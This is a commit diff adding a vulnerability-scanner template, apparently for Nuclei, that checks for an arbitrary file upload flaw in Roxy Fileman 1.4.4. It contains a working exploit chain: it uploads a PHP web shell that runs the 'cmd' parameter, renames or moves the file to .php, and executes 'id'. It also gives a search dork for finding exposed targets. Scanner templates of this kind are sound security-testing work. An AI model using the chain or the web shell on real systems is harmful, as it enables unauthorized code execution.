Create roxyfileman-fileupload.yaml

misconfiguration/roxyfileman-fileupload.yaml

@@ -0,0 +1,105 @@
+id: roxyfileman-fileupload
+
+info:
+  name: Roxy Fileman 1.4.4 - Arbitrary File Upload
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,which keeps a list of forbidden file extensions that the application will not allow to be uploaded. This configuration setting is also checked when renaming an existing file to a new file extension.It is possible to bypass this check and rename already uploaded files to any extension, using the move function as this function does not perform any checks.
+  reference:
+    - https://www.exploit-db.com/exploits/39963
+  metadata:
+    verified: "true"
+    google-dork: intitle:"Roxy file manager"
+  tags: roxy,fileman,rce,fileupload
+
+requests:
+  - raw:
+      - |
+        POST /php/upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
+        Sec-Ch-Ua-Platform: "macOS"
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="action"
+
+        upload
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="method"
+
+        ajax
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="d"
+
+        /app/Uploads
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg"
+        Content-Type: image/jpeg
+
+        <?php
+        echo exec($_GET["cmd"]);
+        ?>
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7--
+
+      - |
+        POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
+        Sec-Ch-Ua-Platform: "macOS"
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php
+
+      - |
+        POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
+        Sec-Ch-Ua-Platform: "macOS"
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php
+
+      - |
+        GET /Uploads/{{randstr}}.php?cmd=id HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200